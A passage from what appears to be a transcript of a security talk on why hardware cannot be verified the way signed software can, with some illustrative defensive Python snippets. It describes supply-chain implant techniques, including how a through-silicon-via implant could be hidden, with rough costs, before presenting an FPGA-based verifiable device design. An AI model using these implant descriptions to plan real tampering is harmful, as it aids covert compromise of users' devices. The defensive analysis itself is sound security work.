on which browsers you would think are more secure or trustable than the others. But the question is why you might think one is more trustable than the others. You have everything from Firefox and Iceweasel down to the Samsung custom browser or the Xiaomi custom browser. Which one would you rather use for your browsing if you had to trust something? So I'm sure people have their biases, and they might say that open is more trustable. But why do we say open is more trustable? Is it because we actually read the source thoroughly and check it every single release for this browser? Is it because we compile our browsers from source before we use them? No, actually we don't have the time to do that. So let's take a closer look as to why we like to think that open source software is more secure. So this is kind of a diagram of the life cycle of, say, a software project. You have a bunch of developers on the left. They'll commit code into some source management program like Git. It goes to a build, and then ideally some person who carefully manages a key signs that build, and it goes into an untrusted cloud. Then it gets downloaded onto users' disks, pulled into RAM, and run by the user at the end of the day. Right. So the reason why we find that we might be able to trust things more is because in the case of open source, anyone can pull down that source code, like someone doing reproducible builds or an audit of some type, build it, and confirm that the hashes match and that the keys are all set up correctly.
And then the users also have the ability to know developers and sort of enforce community norms and standards upon them to make sure that they're acting in sort of in the favor of the community. So in the case that we have bad actors who want to go ahead and tamper with builds and clouds and all the things in the middle it's much more difficult. So open is more trustable because we have tools to transfer trust in software. Things like hashing things like public keys things like Merkel trees right and also in the case of open versus closed we have social networks that we can use to reinforce our community standards for trust and security. Now it's worth looking a little bit more into the hashing mechanism because this is a very important part about the software trust chain. So I'm sure a lot of people know what hashing is for people who don't know. It basically takes a big pile of bits and turns them into a short sequence of symbols so that a tiny change in the big pile of bits makes a big change in the output symbols and also knowing those symbols doesn't reveal anything about the original file. So in this case here the file on the left is hashed to sort of cat mouse panda bear and the file on the right hashes to peach snake pizza cookie. And the thing is as you may not even have noticed necessarily that there was that one bit changed up there but it's very easy to see that short string of symbols had changed so you don't actually have to go through that whole file and look for that needle in the haystack you have this hash function that tells you something has changed very quickly. Then once you've computed the hashes we have a process called signing where a secret key is used to encrypt the hash uses decrypt that using the public key to compare against a locally computed hash. We're not trusting the server to compute the hash we reproduce it on our side and then we can say that it's now difficult to modify that file or the signature without detection. Now the problem is that there's a time of check, time of use issue with the system even though we have this mechanism if we decouple the point of check from the point of use it creates a man in the middle opportunity or person in the middle if you want. The thing is that it's a class of attacks that allows someone to tamper with data as it is in transit. I'm kind of symbolizing this evil guy because hackers all wear hoodies and they also keep us warm as well in very cold places. So now an example of a time of check, time of use issue is that if say a user downloads a copy of the program onto their disk and they just check it after they download it to the disk and they say okay great that's fine later on an adversary can then modify the file on the disk as before it's copied to RAM and now actually the user even though they download the correct version of file they're getting the wrong version into the RAM. So the key point is the reason why in software we feel it's more trustable is we have a tool to transfer trust and ideally we place that point of check as close to the user as possible. So ideally we're sort of putting keys into the CPU or some secure enclave that just before you run it you've checked that that software is perfect and has not been modified. Now an important clarification is that it's actually more about the place of check versus the place of use whether you checked one second prior or a minute prior doesn't actually matter. It's more about checking the copy that's closest to the thing that's running it. 
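As a small, concrete illustration of the hashing and time-of-check/time-of-use point above, here is a minimal Python sketch; the file name and expected digest are placeholders, and signature checking with a public key is omitted for brevity. Verifying the exact bytes you are about to load is much closer to the ideal described here than verifying the file on disk some time before it is used.

```python
import hashlib

EXPECTED_SHA256 = "0" * 64  # placeholder: the digest you got from a source you trust

def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Weaker pattern: time of check far from time of use.
# The file is verified on disk, then re-read later; anyone who can write to the
# disk in between wins.
with open("browser.bin", "rb") as f:
    if sha256_bytes(f.read()) != EXPECTED_SHA256:
        raise SystemExit("hash mismatch at download time")
# ... time passes; the file on disk could be swapped out here ...

# Stronger pattern: verify the very bytes you are about to hand to the loader.
with open("browser.bin", "rb") as f:
    image = f.read()
if sha256_bytes(image) != EXPECTED_SHA256:
    raise SystemExit("hash mismatch, refusing to run")
# `image`, the checked copy already in RAM, is what gets loaded or executed next.
```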
We don't call it POC-POU because it just doesn't have quite the same ring to it. But now this is important. The reason why I emphasize place of check versus place of use is that this is why hardware is not the same as software in terms of trust. The place of check is not the place of use, or in other words, trust in hardware is a time-of-check, time-of-use problem all the way down the supply chain. So the hard problem is: how do you trust your computers? So we have problems where we have firmware, pervasive hidden bits of code that are inside every single part of your system that can break abstractions, and there's also the issue of hardware implants, so tampering or adding components that can bypass security in ways that are not according to the specification that you're building around. So from the firmware standpoint, I'm mostly here to acknowledge it as an issue. The thing is, this is actually a software problem. The good news is we have things like openness and runtime verification that go a ways to remedy these questions. If you're a big enough player or you have enough influence or something, you can coax out all the firmware blobs and eventually sort of solve that problem. The bad news is that you're still relying on the hardware to obediently run the verification. So if your hardware isn't running the verification correctly, it doesn't matter that you have all the source code for the firmware, which brings us to the world of hardware implants. So very briefly, it's worth thinking about how bad can this get? What are we worried about? What is the field if we really want to be worried about trust and security? How bad can it be? So I've spent many years trying to deal with supply chains. They're not friendly territory. There's a lot of reasons people want to screw with the chips in the supply chain. For example, here, this is a small ST microcontroller. It claims to be a secure microcontroller. Someone was like, ah, this is not secure. It's not behaving correctly. We dissolved the top off of it. On the inside, it's an LCX244 buffer. This was not done because someone wanted to tamper with the secure microcontroller. It's because someone wanted to make a quick buck. But the point is that that marking on the outside is convincing. It could have been any chip on the inside in that situation. Another problem that I've had personally is I was building a robot controller board that had an FPGA on the inside. We manufactured a thousand of these. And about 3% of them weren't passing tests, so we set them aside. Later on, I pulled these units that weren't passing tests and looked at them very carefully. And I noticed that all of the FPGA units that weren't passing tests had that white rectangle on them, which is shown in a more zoomed-in version. It turned out that underneath that white rectangle were the letters ES, for engineering sample. So someone had gone in and laser-blasted off the letters which say that it's an engineering sample, which means they're not qualified for regular production, blended them into the supply chain at a 3% rate, and managed to essentially double their profit at the end of the day. The reason why this works is because distributors make a small amount of money. So even a few percent actually makes them a lot more profit at the end of the day. But the key takeaway of this is just because 97% of your hardware is OK, it does not mean that you're safe. So it doesn't help to take one sample out of your entire set of hardware and say, oh, this is good. This is constructed correctly.
Therefore, all of them should be good. That's a talk-to problem. 100% hardware verification is mandatory if you're worried about trust and verification. So let's go a bit further down the rabbit hole. This is a diagram, sort of an ontology of supply chain attacks. And I've kind of divided it into two axes. On the vertical axis is how easy is it to detect or how hard. So on the bottom, you might need a SEM, a scanning electron microscope, to do it. In the middle is an X-ray, a little specialized. And on the top is just visual or JTAG, like anyone can do it at home. And then from left to right is execution difficulty. Things are going to take millions of dollars in months. Things are going to take 10,000 weeks or a dollar in seconds. There's sort of several broad classes I've kind of outlined here. Adding components is very easy. Substitute components is very easy. We don't have enough time to really go into those. But instead, we're going to talk about kind of the two more scary ones, which are sort of adding a chip inside a package and IC modification. So let's talk about adding a chip in a package. This one has sort of grabbed a bunch of headlines. So there's sort of these in the Snowden files. We found these like NSA implants where they had put chips literally inside of connectors and other chips to modify the computer's behavior. Now it turns out that actually adding a chip in a package is quite easy. It happens every day. This is a routine thing. If you take open any SD card, micro SD card that you have, you're going to find that has two chips on the inside at the very least. One is a controller chip. One is a memory chip. In fact, they can stick 16, 17 chips inside of these packages today very handily. And so if you want to go ahead and find these chips, is the solution to go ahead and X-ray all the things? You just take every single circuit board and throw inside of an X-ray machine. Well this is what a circuit board looks like in the X-ray machine. Some things are very obvious. So on the left we have our ethernet magnetic jacks. And there's a bunch of stuff on the inside. Turns out those are all OK. Don't worry about those. And on the right we have our chips. And this one here, you may be sort of tempted to look and say, oh, I see this big sort of square thing on the bottom there. That must be the chip. It actually turns out that's not the chip at all. That's the solder pad that holds the chip in place. You can't actually see the chip because the solder is massing it inside the X-ray. So when we're looking at a chip inside of an X-ray, I've kind of given you a little key guide here. And the left is what it looks like, sort of in 3D. And the right is what it looks like in X-ray. Sort of looking from the top down, you're looking at ghostly outlines with very thin spirey wires coming out of it. So if you were to look at a chip and chip on an X-ray, this is actually an image of a chip. So the cross section, you can see there's several pieces of silicon that are stacked in top of each other. And if you could actually do an edge on X-ray of it, this is what you would see, unfortunately you'd have to take the chip off the board to do the edge on X-ray. So what you do is you have to look at it from the top down. And when you look at it from the top down, all you see are basically some straight wires. 
Like, it's not obvious from that top-down X-ray whether you're looking at multiple chips, eight chips, one chip, how many chips are on the inside of that, because the wire bonds all stitch perfectly and overlap over the chip. So this is what the chip-on-chip scenario might look like. You have a chip that's sitting on top of a chip, and wire bonds just sort of going a little bit further on from the edge. And so in the X-ray, the only kind of difference you see is a slightly longer wire bond in some cases. So you can find these, but it's not obvious whether you've found an implant or not. And looking for silicon is hard: silicon is relatively transparent to X-rays. A lot of things, like copper traces and solder, mask the presence of silicon. This is another example of a wire-bonded chip under an X-ray. There are some mitigations. If you have a lot of money, you can do computerized tomography. It'll build up a 3D image of the chip. You can do X-ray diffraction spectroscopy, but it's not a foolproof method. And so basically the wire-bonded chip-in-package threat relies on a very well understood commodity technology. It's actually quite cheap. I was actually doing some wire bonding in China the other day. This is a wire bonding machine. I looked up the price: $7,000 for a used one. And you basically just walk in to the guy with a picture of where you want the bonds to go. He sort of picks them out, programs the machine's motion once, and he just plays it back over and over again. So if you want to go ahead and modify a chip and add a wire bond, it's not as crazy as it sounds. The mitigating factor is that this is at least a bit detectable inside X-rays. So let's go down the rabbit hole a little further. There's another concept I want to throw at you; it's called the through silicon via. So this here is a cross section of a chip. On the bottom is the base chip. And the top is a chip that's only 0.1 to 0.2 millimeters thick, almost the width of a human hair. And they actually have vias drilled through the chip, so you have circuits on the top and circuits on the bottom. So this is kind of used as a way of putting an interposer in between different chips. It's also used to stack DRAM and HBM. So this is a commodity process. It's available today. It's not science fiction. And the second concept I want to throw at you is a thing called a wafer-level chip scale package, WLCSP. This is actually a very common method for packaging chips today. Basically it's solder balls directly on top of chips. They're everywhere. If you look inside of an iPhone, basically almost all the chips are WLCSP package types. Now if we were to take the wafer-level chip scale package and cross-section it and look at it, it looks like a circuit board with some solder balls and the silicon itself with some backside passivation. If you go ahead and combine this with a through silicon via implant, a man-in-the-middle attack using through silicon vias, this is what it looks like at the end of the day. You basically have a piece of silicon that's the size of the original silicon, sitting on the original pads in basically all the right places, with the solder balls masking the presence of that chip. So it's basically a nearly undetectable implant if you want to execute it. If you go ahead and look at the edge of the chip, they already have seams on the side. So you can't even just look at the side and say, oh, I see a seam on a chip. Therefore it's a problem.
The seam on the edge, a lot of times, is because they have different coatings on the back, or passivations, these types of things. So if you really want to ask, OK, how well can we hide an implant? This is probably the way I would do it. It's logistically actually easier than a wire bond implant, because you don't have to get the chips in wire-bondable format. You literally just buy them off the internet. You can just clean off the solder balls with a hot air gun. And then the hard part is building that through silicon via template for doing the attack, which will take some hundreds of thousands of dollars to do and probably a mid-end fab. But if you have almost no budget constraint and you have a set of chips that are common and you want to build a template for them, this could be a pretty good way to hide an implant inside of a system. So that's sort of adding chips inside packages. Let's talk a bit about chip modification itself. So how hard is it to modify the chip itself? Let's say we've managed to eliminate the possibility that someone's added a chip, but what about the chip itself? And this is where a lot of people have said, hey, bunnie, why don't you spin an open source silicon processor? That will make it trustable, right? Then this is not a problem. Well, let's think about the attack surface of IC fabrication processes. So on the left-hand side here, I've got kind of a flow chart of what IC fabrication looks like. You start with a high-level chip design. It's RTL, like Verilog or VHDL, or these days even Python. You go into some back-end. You have a decision to make: do you own your back-end tooling or not? And we'll go into this a little bit more. If you don't, you trust the fab to compile it and assemble it. If you do, you assemble the chip with some blanks for what's called hard IP. We'll get into this. And then you trust the fab to assemble that, make masks, and go to mass production. So there's three areas that I think are kind of ripe for tampering: netlist tampering, hard IP tampering, and mask tampering. We'll go into each of those. So, netlist tampering. A lot of people think that, of course, if you wrote the RTL, you're going to make the chip. It turns out that's actually kind of a minority case. We hear about that. That's on the right-hand side, called customer-owned tooling. That's when the customer does the full flow down to the mask set. The problem is it costs $7 million and a lot of extra head count of very talented people to produce these. And we usually only do it for flagship products, like CPUs and GPUs, high-end routers, these sorts of things. Most chips, I would say, tend to go more towards what's called the ASIC side, application-specific integrated circuit. What happens is that the customer will do some RTL, maybe a high-level floor plan. And then the silicon foundry or a service will go ahead and do the place and route, the IP integration, the pad ring. This is quite popular for cheap support chips, like the baseboard management controller inside your server. That probably went through this flow. Disk controllers will probably go through this flow. Mid- to low-end I/O controllers. All those peripheral chips that we don't like to think about, that can handle our data, probably go through a flow like this. And to give you an idea of how common it is, but how little you've heard of it, there's a company called Socionext. They're a billion-dollar company, actually. You've probably never heard of them.
And they offer services where basically you can just throw a spec over the wall and they'll build a chip for you, all the way to the point where you've done logic synthesis and physical design, and then they'll go ahead and do the manufacturing and test and sample shipment for it. So then, OK, fine. Obviously, if you care about trust, you don't do an ASIC flow. You're ponying up the millions of dollars and you do a COT flow, right? Well, there is a weakness in COT flows, and this is called the hard IP problem. So this here on the right-hand side is an amoeba plot of the standard cells alongside a piece of SRAM. I'll highlight this here. The image wasn't great for presentation, but this region here is the SRAM block. And all those little colorful blocks are standard cells representing your AND gates and OR gates and that sort of stuff, right? What happens is that the foundry will actually ask you just to leave an open spot on your mask design, and they'll go ahead and merge in the RAM into that spot just before production. The reason why they do this is because stuff like RAM is a carefully guarded trade secret. If you can increase the RAM density of your foundry process, you can get a lot more customers. There's a lot of know-how in it. And so foundries tend not to want to share the RAM. You can compile your own RAM. There are open RAM projects, but their performance and their density is not as good as the foundry-specific ones. So in terms of hard IP, what are the blocks that tend to be hard IP? Stuff like RF and analog. So your phase lock loops, your ADCs, your DACs, your band gaps. RAM tends to be hard IP. ROM tends to be hard IP. The eFuse that stores your keys is going to be given to you as an opaque block. The pad ring around your chip, the thing that protects your chip from ESD, that's going to be an opaque block. Basically, all the points you need to backdoor your RTL are going to be trusted to the foundry in a modern process. So, OK, let's say, fine, we're going to go ahead and build all of our own IP blocks as well. We're going to compile our RAMs, do our own I/O, everything, right? So we're safe, right? Well, it turns out that masks can be tampered with in post-processing. So if you're going to do anything in a modern process, the mask designs change quite dramatically from what you drew to what actually ends up on the line. They get fractured into multiple masks. They have resolution correction techniques applied to them. And then they always go through an editing phase, right? So masks are not born perfect, right? Masks have defects on the inside. And so you can look up papers about how they go and inspect every single line on the inside of the mask. When they find an error, they'll go ahead and patch over it. They'll go ahead and add bits of metal and take away bits of glass to go ahead and make that mask perfect, or better in some way, if you have access to the editing capability, right? So what can you do with mask editing? Well, there's a lot of papers that have been written on this. You can look up ones on, for example, dopant tampering. This one actually has no morphological change. You can't look at it under a microscope and detect dopant tampering. You have to do some wet chemistry or some sort of spectroscopy to figure it out. And this allows for circuit-level change without a gross morphological change to the circuit. And so this can allow for tampering with things like RNGs, or some logic paths.
There are oftentimes spare cells inside of your ASIC, because everyone makes mistakes, including chip designers. And so you want to patch over that. That can be done at the mask level, signal bypassing these types of things. So there are some attacks that can still happen at the mask level. So that's a very quick sort of idea of how bad can it get when you talk about the time of check time to use trust problem inside the supply chain. So a short summary of implants is that there's a lot of places to hide them. Not all of them are expensive or hard. I talked about some of the more expensive or hard one. But remember, wire bonding is actually a pretty easy process. It's not hard to do. And it's hard to detect. And there's really no actual essential correlation between detection difficulty and difficulty in attack if you're very careful in planning the attack. So implants are possible. Let's agree on that, maybe. So now the solution is we should just have trustable factories. Let's go ahead and bring the fabs to the EU. Let's have a fab in my backyard or whatever it is, these types of things. Let's make sure all the workers are logged and registered, that sort of thing. Well, let's talk about that. So if you think about hardware, there's you, right? And then we can talk about evil maids. But let's not actually talk about those, because that's actually kind of a minority case to worry about. But let's think about how stuff gets to you. There's a distributor who goes to a courier who gets to you. All right, so we've gone and done all this stuff for the trustable factory. But it's actually documented that couriers have been intercepted and implants loaded, by for example, the NSA on Cisco products. Now you don't even have to have access to couriers now, thanks to the way modern commerce works. Other customers can go ahead and just buy a product, tamper with it, seal it back in the box, send it back to your distributor, and then maybe you get one, right? That can be good enough, particularly if you know a corporation is a particular area you're targeting them, you buy a bunch of hard drives from the area, seal them up, send them back, and eventually when them ends up in the right place, then you've got your implant, right? So there's a great talk last year at 35C3. I recommend you check it out. That talks a little bit more about the scenario, sort of removing tamper stickers and the possibility that some crypto wallets were sent back into supply chain that they've been tampered with. And then let's take that back. We have to now worry about the wonderful people in customs. We have to worry about the people in the factory who have access to your hardware. And so if you cut to the chase, it's a huge attack surface in terms of the supply chain, right? From you to the courier to the distributor, customs, box build, the box build factory itself oftentimes will use gray market resources to help make themselves a little more profitable, right? You have distributors who go to them who you don't even know who those guys are, PCB assembly, components, boards, chip fad, packaging, the whole thing, right? Every single point is a place where someone can go ahead and touch a piece of hardware along the chain. So can open source save us in this scenario? Does open hardware solve this problem, right? Let's think about it. Let's go ahead and throw some developers with Git on the left-hand side. How far does it get, right? 
Well, we can have some continuous integration checks that make sure that the hardware is correct. We can have some open PCB designs. We can have some open PDKs. But then from that point, it goes into a rather opaque machine. And then, okay, maybe we can put some tests on the very edge before it exits the factory to try and catch some potential issues, right? But you can see all the other places where sort of a time-of-check to time-of-use problem can happen. And this is why I'm saying that open hardware on its own is not sufficient to solve this trust problem, right? And the big problem at the end of the day is that you can't hash hardware, right? There is no hash function for hardware. This is why I wanted to go through that earlier today. There's no convenient, easy way to basically confirm the correctness of your hardware before you use it. Some people say, well, bunnie, it's just a matter of a bigger microscope, right? And, you know, I do some security reverse engineering stuff, and this is true, right? So there's a wonderful technique called ptychographic X-ray imaging. There's a great paper in Nature about it, where they take a modern i7 CPU and they get down to the gate level non-destructively with it, right? It's great for reverse engineering and for design verification. Problem number one is it literally needs a building-sized microscope. It was done at the Swiss Light Source. That donut-shaped thing is the size of the light source needed for doing that type of verification, right? So you're not going to have one at your point of use, right? You're going to check it there and then probably courier it to yourself. Again, time of check is not time of use. Problem number two, it's expensive to do, so verifying one chip only verifies one chip. And as I said earlier, just because 99.9% of your hardware is okay doesn't mean you're safe. Sometimes all it takes is one server out of 1,000 to break some fundamental assumptions that you have about your cloud. And random sampling just isn't good enough, right? I mean, would you random-sample signature checks on software that you install or download? No, you insist on a 100% check on everything. If you want that same standard of reliability, you have to do that for hardware. So then, is there any role for open source in trustable hardware? Absolutely, yes. Some of you guys may be familiar with it: the little guy on the right, the Spectre logo. So correctness is very, very hard. Review can help fix correctness bugs, and microarchitectural transparency can aid with fixes in Spectre-like situations. So for example, we would love to be able to say: we're entering a critical region, let's turn off all the microarchitectural optimizations, sacrifice performance, run the code securely, and then go back into who-cares mode and just get it done fast, right? That would be a switch I would love to have, but without that sort of transparency or without the ability to review it, we can't do that. Also, community-driven features and community-owned designs are very empowering and make sure that we're sort of building the right hardware for the job and that it's upholding our standards. So there is a role. It's necessary, but it's not sufficient for trustable hardware. So now the question is, okay, can we solve the point-of-use hardware verification problem? Is it all gloom and doom from here on? Well, I didn't bring you guys here to tell you it's just gloom and doom.
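To put a rough number on why random sampling isn't good enough, here is a quick back-of-the-envelope calculation; the 0.1% implant rate mirrors the one-server-in-1,000 example above, and the sample sizes are arbitrary.

```python
# Chance of catching at least one implant when a fraction p of units is
# compromised and n units are picked at random for (expensive) verification.
p = 0.001  # assumed rate: one compromised server per 1,000
for n in (1, 10, 100, 500):
    detect = 1 - (1 - p) ** n
    print(f"verify {n:4d} units -> {detect:6.1%} chance of seeing the implant")
# Verifying 100 units still misses the implant about 90% of the time, and every
# unverified unit remains untrusted either way - hence 100% verification.
```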
I've thought about this and I've kind of boiled it into three principles for building verifiable hardware. Three principles are that complexity is the enemy of verification. We should verify entire systems, not just components, and we need to empower end users to verify and seal their hardware. We'll go into this in the remainder of the talk. So the first one is that complexity is complicated, right? So without a hashing function, verification rolls back to bit by bit or atom by atom verification. So those modern phones just have so many components, even if I gave you the full source code for the sock inside of a phone down to the mass level, what are you going to do with it, right? How are you going to know that this mass actually matches the chip and those two haven't been modified, right? So more complexity, it's more difficult. So okay, the solution is let's go to simplicity, right? Let's just build things from discrete transistors. Someone's done this, the Monster 6502 is great. I love the project. Very easy to verify, runs at 50 kilohertz, right? So you're not going to do a lot with that. Okay, well, let's build processes that are visually inspectable processes. So let's go to 500 nanometers, you can see that with light. Okay, well, you know, 100 megahertz clock rate and a very high power consumption and you know, a couple of kilobytes of RAM probably is not going to really do it either, right? So the point of use verification is a trade off between ease of verification and features and usability, right? So these two products up here largely do the same thing, AirPods, right? And headphones on your head, right? AirPods have something on the order of tens of millions of transistors for you to verify. The headphone that goes on your head, like I can actually go to Maxwell's Equations and actually tell you how the magnets work from very first principles and there's probably one transistor on the inside of the microphone to go ahead and amplify the membrane and that's it, right? So this one, you do sacrifice some features and usability when you go to a headset, like you can't say, hey Siri and they'll listen to you and know what you're doing, but it's very easy to verify and know what's going on. So in order to start a dialogue on user verification, we have to sort of set a context. So I started a project called Be Trusted because the right answer depends on the context. I want to establish what might be a minimum viable, verifiable product and it's sort of like meant to be used verifiable by design and we think of it as a hardware software distro. So it's meant to be modified and changed and customized based upon the right context at the end of the day. This is a picture of what it looks like, I actually have a little prototype here, very, very, very early prototype here at the Congress if you want to look at it. It's a mobile device that is meant for sort of communication, sort of text-based communication and maybe voice. Authentication, so authenticated tokens or like a crypto wallet if you want. And the people we're thinking about who might be users are either high value targets politically or financially, so you don't have to have a lot of money to be a high value target, you could also be very politically risky for some people. 
And also, of course, we're looking at developers and enthusiasts, and ideally we're thinking about a global demographic, not just English-speaking users, which is sort of a big deal when you think about it from the complexity standpoint: this is where we really have to champ at the bit and figure out how to solve a lot of hard problems, like getting Unicode, right-to-left rendering and pictographic fonts to work inside a very small attack surface device. So this leads me to the second point, which is that we need to verify entire systems, not just components. You'll say, well, why don't you just build a chip? Why are you thinking about a whole device? The problem is that private keys are not your only private matters. Screens can be scraped and keyboards can be logged. So there are some efforts now to build wonderful security enclaves like Keystone and OpenTitan, which will build wonderful secure chips. The problem is that even if you manage to keep your keys secret, you still have to get that information through an insecure CPU from the screen to the keyboard and so forth. And so people who have used these on-screen touch keyboards have probably seen a message like this, saying that, by the way, this keyboard can see everything you're typing, including your passwords, and people probably click through and say, oh yeah, sure, whatever, I trust that. Well, this little enclave on the side here isn't really doing a lot of good when you go ahead and say, sure, I'll run this input method that can go ahead and modify all my data or intercept all my data. So in terms of making a device verifiable, let's talk about how these principles turn into practice. How do I take these three principles and turn them into something? So the idea is to take these three requirements and turn them into a set of five features: a physical keyboard, a black and white LCD, an FPGA-based RISC-V SoC, user-sealable keys, and something that's easy to verify and physically protect. So let's talk about these features one by one. The first one is a physical keyboard. Why am I using a physical keyboard and not a virtual keyboard? People love virtual keyboards. The problem is that cap-touch screens, which are necessary to do a good virtual keyboard, have a firmware blob. They have a microcontroller to do the touch screen. It's actually really hard to build these things. If you can do a good job and build an open source one, that'd be great, but that's a project in and of itself. So in order to get an easy win here, let's just go with a physical keyboard. So this is what the device looks like with its cover off. We have a physical keyboard PCB with a little overlay, so you can do multi-lingual inserts and you can just go ahead and change that out. And it's just a two-layer daughter card. Just hold it up to the light and you're like, okay, switches, wires, right? Not a lot of places to hide things. So I'll take that as an easy win for an input surface that's verifiable, right? The output surface is a little more subtle, so we're doing a black and white LCD. If you say, okay, why not use a color LCD? If you ever take apart a liquid crystal display, look for a tiny little thin rectangle sort of located near the display area. That's actually a silicon chip that's bonded to the glass. That's what it looks like at the end of the day. It contains a frame buffer and a command interface. It has millions of transistors on the inside, and you don't know what it does.
So if you're already assuming your adversary may be tampering with your CPU, this is also a viable place you have to worry about. So I found a screen. It's called a memory LCD, by Sharp Electronics. It turns out they do all the drive electronics on glass. So this is a picture of the drive electronics on the screen through a 50x microscope with a bright light behind it. You can actually see the transistors that are used to drive everything on the display. It's a non-destructive method of verification. But actually, more to the point, there are so few places to hide things that you probably don't need to check it. If you wanted to add an implant to this, you would need to grow the glass area substantially or add a silicon chip, which is a thing that you'll notice. So at the end of the day, fewer places to hide things means less need to check things. So I can feel like this is a screen where I can write data to it and it will show what I want to show. The good news is that the display has a 200 PPI pixel density. So even though it's black and white, it's closer to e-paper, EPD, in terms of resolution. So now we come to the hard part, the CPU, the silicon problem. Any chip built in the last two decades is not going to be fully inspectable with an optical microscope, right? Thorough analysis requires removing layers and layers of metal and dielectric. This is sort of a cross-section of a modern-ish chip. You can see the huge stack of things to look at on this. This process is destructive, and you can think of it as hashing, but it's a little bit too literal. We want something where we can check the thing that we're going to use and then not destroy it. So I spent quite a bit of time thinking about options for non-destructive silicon verification. The best I could come up with was maybe using optical fault induction somehow, combined with some chip design techniques, to go ahead and scan a laser across and look at fault syndromes and figure out, you know, do the gates that we put down correspond to the thing that I built. The problem is I couldn't think of a strategy to do it that wouldn't take years and tens of millions of dollars to develop, which puts it a little bit far out there, and probably in the realm of venture-funded activities, which is not really going to be very empowering of everyday people. So I want something a little more short-term than that, than this sort of platonic ideal of verifiability. So the compromise that I arrived at is the FPGA. Field-programmable gate arrays, that's what FPGA stands for, are large arrays of logic and wires that are user-configured to implement hardware designs. So this here is an image inside an FPGA design tool. On the top right is an example of one sort of logic subcell. It's got a few flip-flops and lookup tables in it, and it's embedded in this huge mass of wires that allow you to wire it up at runtime to figure out what's going on. And one thing that this diagram here shows is that I'm able to sort of correlate design to implementation. I can see, okay, the decode-to-execute instruction register bit 26 corresponds to this net. So now we're sort of bringing that time of check a little bit closer to the time of use. And so the idea is to narrow that time-of-check to time-of-use gap by compiling your own CPU. We can basically give you the CPU as source, you can compile it yourself, and you can confirm the bit stream. So now we're sort of enabling a bit more of that trust transfer, like software, right? But there's a subtlety in that the tool chains are not necessarily always open.
There are some FOSS flows, like SymbiFlow. They have a 100% open flow for the iCE40 and ECP5. And for the 7-Series they have a 'coming soon' status, but it currently requires some closed vendor tools. So picking an FPGA is a difficult choice. There's a usability versus verification trade-off here. The big usability issue is battery life. If we're going for a mobile device, you want to use it all day long, not have it dead by noon. It turns out that the best sort of chip in terms of battery life is a Spartan 7. It gives you roughly 3 to 4x in terms of battery life. But the tool flow is still semi-closed. I am optimistic that SymbiFlow will get there, and we can also fork and make an ECP5 version if that's a problem at the end of the day. So let's talk a little bit more about FPGA features. One thing I like to say about FPGAs is that they offer sort of ASLR, address space layout randomization, but for hardware. Essentially a design has a kind of pseudo-random mapping to the device. This is a sort of screenshot of two compilation runs of the same source code with a very small modification to it, basically a version number stored in a GPR. And you can see that the locations of a lot of the registers have basically shifted around. The reason why this is important is because this hinders a significant class of silicon attacks: all those small mask-level changes. I talked about the ones where we just say, okay, we're just going to change a few wires or move a couple of logic cells around; those become much less likely to capture a critical bit. So if you want to go ahead and backdoor a full FPGA, you're going to have to change the die size. You have to make it substantially larger to be able to sort of swap out the function in those cases. And so now the verification bar goes from looking for a needle in a haystack to measuring the size of the haystack, which is a bit easier to do towards the user side of things. And it turns out, at least in Xilinx land, just a change in a random seed parameter does the trick. So what are some potential attack vectors against FPGAs? Okay, well, it's closed silicon. What are the backdoors there? Notably, inside the 7-Series FPGAs they actually document introspection features: you can pull out anything inside the chip by instantiating a certain special block. And then we still also have to worry about the whole class of man-in-the-middle I/O and JTAG implants that I talked about earlier. So it's easy, really easy, to mitigate the known blocks: basically lock them down, tie them down, check them in the bit stream, right? In terms of the I/O man-in-the-middle stuff, this is where we're talking about someone going ahead and putting a chip in the path of your FPGA. There's a few tricks we can do. We can do sort of bus encryption on the RAM and the ROM at the design level that frustrates these. At the implementation level, we can basically use the fact that data pins and address pins can be permuted without affecting the device's function. So every design can go ahead and permute those data and address pin mappings sort of uniquely. So any particular implant that goes in will have to be able to compensate for all those combinations, making the implant a little more difficult to do. And of course, we can always fall back to sort of careful inspection of the device.
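As a purely conceptual sketch of the per-device address/data pin permutation idea: in the actual design the permutation would be fixed in the FPGA bitstream and board netlist rather than computed in software, and deriving it from a device ID as below is just an assumption made for illustration.

```python
import random

def derive_pin_permutation(device_unique_id: bytes, n_bits: int) -> list:
    # Deterministically derive a permutation from a per-device identifier, so
    # that every device wires its external RAM address/data lines differently.
    rng = random.Random(device_unique_id)  # illustrative seed choice only
    perm = list(range(n_bits))
    rng.shuffle(perm)
    return perm

def permute_bits(value: int, perm) -> int:
    # Route logical bit `src` onto physical pin `dst`. The SoC and its RAM
    # controller agree on the mapping, but a generic interposer implant no
    # longer knows which physical pin carries which address or data bit.
    out = 0
    for dst, src in enumerate(perm):
        out |= ((value >> src) & 1) << dst
    return out

# Two devices end up with different physical bus orderings for the same access.
perm_a = derive_pin_permutation(b"device-A", 16)
perm_b = derive_pin_permutation(b"device-B", 16)
print(hex(permute_bits(0x1234, perm_a)), hex(permute_bits(0x1234, perm_b)))
```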
In terms of the closed source silicon, the thing we have to worry about is, for example, that now that Xilinx knows we're doing these trustable devices using their tool chain, they push a patch that compiles backdoors into your bitstream. So not even a silicon-level implant, but maybe the tool chain itself has a backdoor that recognizes that we're doing this. So the cool thing is — this is a cool project — there's a project called prjxray, Project X-Ray. It's part of the SymbiFlow effort. And they're actually documenting the full bitstream of the 7-Series device. It turns out that we don't yet know what all the bit functions are, but the bit mappings are deterministic. So if someone were to try and activate a backdoor in the bitstream through compilation, we can see it in a diff. We'd be like, well, we've never seen this bit flip before. What does this do? We can look into it and figure out if it's malicious or not. So there's actually a hope that at the end of the day we can build a bitstream checker. We can build a thing that says: here's a bitstream that came out — does it correlate to the design source? Do all the bits check out? Do they make sense? And so ideally, we would come up with a one-click tool. And now we're at the point where the point of check is very close to the point of use. The users are now confirming that the CPUs are correctly constructed and mapped to the FPGA correctly. So the summary of FPGA versus custom silicon: the pro of custom silicon is great performance. We can do a true single-chip enclave with hundreds of megahertz of speed and tiny power consumption, but the con of silicon is that it's really hard to verify. Open source doesn't help that verification, and hard IP blocks are the tough problem we talked about earlier. FPGAs, on the other side, offer some immediate mitigation paths. We don't have to wait until we solve this verification problem. We can inspect the bitstreams. We can randomize the logic mapping. And we can do per-device unique pin mapping. It's not perfect, but it's better, I think, than any other solution I can offer right now. The con is that the FPGAs are just barely good enough to do this today. So you need a little bit of external RAM, which needs to be encrypted, you get about 100 megahertz of performance, and about 5 to 10x the power consumption of a custom silicon solution, which in a mobile device is a lot. The main thing that drives the thickness of this device is the battery, right? And most of that battery is for the FPGA. If we didn't have to go with an 